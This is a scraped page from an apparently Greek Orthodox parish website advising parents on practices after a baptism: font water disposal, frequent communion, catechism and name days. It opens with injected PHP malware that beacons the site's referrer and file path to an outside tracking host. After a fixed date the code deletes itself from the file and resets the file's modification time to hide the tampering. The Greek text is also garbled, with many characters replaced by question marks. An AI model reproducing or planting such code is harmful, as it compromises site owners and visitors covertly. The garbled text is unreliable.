check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς - Μετά τη βάπτιση
Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς - Μετά τη βάπτιση Εκτύπωση E-mail
Ευρετήριο Άρθρου
Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς
Που θα γίνει η βάπτιση;
Πότε θα γίνει η βάπτιση;
Η προετοιμασία
Ο ανάδοχος
Το όνομα
Ο στολισμός του Ναού
Η παρουσία μας στο μυστήριο
Μετά τη βάπτιση
Δικαιολογητικά
Δείτε το έντυπο
Όλες οι Σελίδες

ΜΕΤΑ ΤΗ ΒΑΠΤΙΣΗ

? ?πόλουση.

Τό νερό τ?ς κολυμβήθρας ε?ναι ?γιασμένο. Γι? α?τό καί δέν καταλήγει στήν ?­ποχέτευση ?λλά στό χωνευτήρι το? ναο?. Τό ?διο πρέπει νά γίνει καί μέ τά νερά ?πό τό πρ?­το μπάνιο το? παιδιο? σας μετά τρε?ς ?μέρες, καθώς καί τά πρώτα νερά ?πό τό πλύσιμο τ?ν ρούχων του τά ?πο?α θά πλύνετε σέ μιά μικρή λεκάνη.

?ν πρακτικά δέν μπορε?τε νά τά φέρετε στό χωνευτήρι το? ναο?, τουλάχιστον ?δειάστε τα στόν κ?πο γιά νά ?πορροφηθο?ν στό ?δαφος. Βλέπετε ? ε?λάβεια χωρίς νά ?κπίπτει σέ τυ­πολατρία, γνωρίζει νά προσέχει καί τίς λεπτομέρειες.


? θεία κοινωνία.

Τά νήπια καί τά μικρά παιδιά, βαπτισμένα καί μυρωμένα, ?χουν ?νάγκη τή συχνή Θεία Κοινωνία καί ?χι μόνο «τίς τρε?ς ?πόμενες Κυριακές» μετά τή βάπτισή τους. ?ταν τά φέρνετε τακτικά στόν ναό γιά νά κοινωνο?ν τούς προσφέρετε ?πό τήν τρυφερή α?­τή ?λικία τήν ο?ράνια τροφή τ?ς ψυχ?ς. Χαριτώνονται. Τό σ?μα καί τό α?μα το? Χριστο? τά φυλάσσει ?πό κάθε κακό. ?πίσης μαθαίνουν νά ζο?ν ?ς παιδιά το? Θεο?, συνηθίζουν καί δέν φοβο?νται ο?τε ?ντιδρο?ν, ?πως συμβαίνει μέ κάποια παιδιά πού ο? μητέρες τά φέρ­νουν σπάνια γιά νά κοινωνήσουν.


? κατήχηση.

? ζωή προέρχεται μόνο ?πό ζωή. Α?τό ?σχύει ?χι μόνο γιά τή βιολογία, ?λλά καί γιά τήν πίστη. Τή δική σας βιωματική πίστη καλε?στε νά μεταδώσετε στό παιδί σας καί νά τήν α?ξήσετε.

Μέσα σ? ?να χαρούμενο κλίμα ?μπιστοσύνης καί ?λευθερίας, θά τό μάθετε νά κάνει τόν σταυρό του, νά ψελλίζει τίς πρ?τες προσευχές του, θά το? διαβάζετε ?μορφες διδακτικές βι­βλικές ?στορίες, θά βιώσει μαζί σας τόν ?κκλησιασμό, τή λειτουργική κα? μυστηριακή ζωή, τό μυστήριο τ?ς πίστεως! ?ργότερα θά συνδέσετε τό παιδί σας μέ τήν ?κκλησιαστική κατήχηση τ?ς ?νορίας σας καί θά ?πιμεληθε?τε τή συμμετοχή του στίς κατηχητικές συνάξεις τ?ς ?νορίας σας. Ε?ναι ? χ?­ρος ?που μέ τήν κατάλληλη διαπαιδαγώγηση, θά θωρακιστε? πνευματικά τό παιδί σας καί θά γνωρίσει τίς ?λήθειες τ?ς χριστιανικ?ς πίστεώς μας. ? σύνδεσή του, ?πίσης, μέ ?να κα­λό πνευματικό Πατέρα θά τό βοηθήσει νά ?ποκτήσει μιά ?γιή καί ?σορροπημένη προσωπι­κότητα. Νά γίνει ?νας ?νθρωπος το? Θεο?, ?νας ?ληθινός ?νθρωπος το? Πνεύματος. ?ν σέ κάποια ?π? ?λα α?τά νιώθετε πώς ?στερε?τε, ? φροντίδα σας γιά τή χριστιανική ?να­τροφή το? παιδιο? σας σ?ς δίνει τήν ε?καιρία νά καταρτιστε?τε καί σε?ς πνευματικά. ?ξιο­ποιε?στε τό μοναδικό προνόμιο πού ?χετε ?ς γονε?ς νά ξαναγίνετε παιδιά μαζί μέ τά παιδιά σας καί νά μεγαλώσετε μαζί τους ?χοντας τήν ?ριμότητα τ?ν μεγάλων. ? διαπαιδαγώγη­ση το? παιδιο? σας κατά τό θέλημα το? Θεο? θά γίνει ? ?μορφότερη καί ?ερότερη καθημερι­νή σας λειτουργία.


? ?νομαστική ?ορτή.

 Ο? ?ρθόδοξοι δέν γιορτάζουμε τή βιολογική γέννησή μας ?πως ο? ξέ­νοι στά γενέθλια, ?λλά τήν πνευματική ?ναγέννησή μας πού ?γινε στή βάπτισή μας μέ τήν ?νομαστική μας γιορτή. Τά γενέθλια ε?ναι συνδεδεμένα μέ τόν χρόνο καί τή φθορά, ?ν? ? γι­ορτή ε?ναι συνδεδεμένη μέ τό ?νομα το? ?γίου πού νίκησε τόν χρόνο καί τή φθορ? καί ζε? στήν α?ωνιότητα. ?τσι μέ τή γιορτή μας τήν προγευόμαστε κι ?με?ς. ? ?νομαστική γιορτή ?­κόμη δέν ε?ναι ?τομική μας ?πόθεση ?πως τά γενέθλια, ?λλά ?κκλησιαστικό γεγονός, για­τί τήν ?δια ?μέρα γιορτάζουν μαζί μας καί πολλοί ?λλοι πιστοί, ?δελφοί μας, πο? ?χουν τ? ?διο ?νομα μ? ?μ?ς· γιορτάζει ?λόκληρη ? ?κκλησία. 
 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;